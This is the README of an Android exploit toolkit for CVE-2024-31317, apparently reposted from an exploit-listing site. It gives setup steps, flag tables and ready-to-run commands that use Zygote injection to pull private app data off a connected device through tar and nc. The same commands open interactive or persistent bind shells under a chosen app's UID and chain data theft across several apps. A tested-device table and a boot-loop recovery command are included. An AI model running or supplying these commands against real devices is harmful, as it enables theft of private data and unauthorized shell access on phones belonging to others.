Share
## https://sploitus.com/exploit?id=40187164-DBA5-5879-B69E-0A8D33583A92
# Zygote Toolkit - CVE-2024-31317
This is a toolkit that uses CVE-2024-31317 to extract private app data via ADB or spawn a shell with an app's UID. This vulnerability affects Android versions from 9 to 14 running on security patch level 2024-06-01 or lower. A support matrix of tested devices can be found below.
## Prerequisites
### Debian/Ubuntu (system packages)
```bash
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools
```
Add the `export` lines to `~/.bashrc` (or equivalent) for persistence.
### Verify
```bash
./setup.sh
```
## Quick Start
```bash
# Build and install the carrier APK (auto-builds from source)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y
# Extract an app's data directory
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app
```
The exploit builds everything from `Hijack.java` and `AndroidManifest.xml` at
first run.
## Usage
```
python3 cve_2024_31317.py [flags] [package]
```
### Modes
| Flag | Description |
|------|-------------|
| `-E` | Extract app data via grandchild tar \| nc (survives parent kill) |
| `-i` | Interactive bind shell REPL |
| `-S PORT` | Persistent shell (FIFO single-port protocol) |
| `--recover` | Reset setting, fix boot hang / Zygote degradation |
| `--setup` | Build + install carrier APK only (no injection) |
| `--list-apps` | List all installed packages with UID and sys/user type |
| `--check-vuln` | Check if device is vulnerable to CVE-2024-31317 and exit |
### Options
| Flag | Description |
|------|-------------|
| `-o file.tar` | Output path for extraction tarball |
| `-y` / `--yes` | Skip confirmation prompts |
| `--retries N` | Max retries per target (default 3) |
| `--chain-targets "pkg1,pkg2"` | Extract multiple apps in one session |
| `--chain-file file.json` | Same as above, from JSON file |
| `--reboot-after` | Reboot after extraction (restores Zygote) |
| `--reboot-every N` | Reboot after every N chain targets |
| `--cold` | Skip warm-up; store payload for next app launch |
| `--port PORT` | Bind shell port (default 8888) |
| `-d SERIAL` | Target specific device (multiple connected) |
| `--rebuild` | Force rebuild carrier APK |
## Examples
```bash
# Extraction
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube
# Check if device is vulnerable
python3 cve_2024_31317.py -d DEVICE --check-vuln
# Interactive bind shell
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube
# Persistent shell on port 7777
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube
# Multi-app chain
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"
# Recovery only (fix boot loop)
python3 cve_2024_31317.py -d DEVICE --recover
```
## Building from Source
Everything builds from source at runtime. The build pipeline uses `javac`
(JDK 17+), `d8`, `aapt`, `zipalign`, and `apksigner` from the Android SDK.
- **x86_64 โ arm64:** tools run natively; the DEX output is architecture-independent
- **ARM64 โ arm64:** everything runs natively (Adoptium provides ARM64 JDK builds)
## Passcode
If the device has a passcode, it starts BFU (Before First Unlock). The exploit
polls `sys.user.0.ce_available` for up to 5 minutes until you unlock. It is recommended to remove the passcode for the duration of the exploit.
## Tested Devices
| Device | Android | API | Patch | ABI | `-E` | `-i` | `-S` | `--chain` | `--cold` | `--retries` | `--recover` | `--reboot-after` | `--list-apps` | `--check-vuln` | Score |
|--------|---------|-----|-------|-----|------|------|------|-----------|----------|-------------|-------------|------------------|--------------|----------------|-------|
| Google Pixel 3 | 12 | 31 | 2021-10-05 | arm64-v8a | โ
| โ
| โ
| โ
| โ
| โ
| โ
| โ
| โ
| โ
| 12/12 |
| Samsung SM-P615 Tab S6 Lite | 13 | 33 | 2024-05-01 | arm64-v8a | โ
| โโ | โโ | โ
| โ
| โโ | โ
| โ
| โ
| โ
| 9/12 |
| sdk_gphone_x86_64 (emulator) | 10 | 29 | 2019-09-05 | x86_64 | โ
| โ
| โ
| โ
| โ
| โ
| โ
| โ
| โ
| โ
| 12/12 |
โ Samsung One UI specific: ZNJECT injection succeeds and `-E` extraction works, but the `toybox nc` ServerSocket bind shell never opens. Needs further research to find the root cause of the problem.
## Recovery
Payload remains in `hidden_api_blacklist_exemptions` can cause a boot loop on
next boot. Run `--recover` to reset:
```bash
python3 cve_2024_31317.py -d DEVICE --recover
```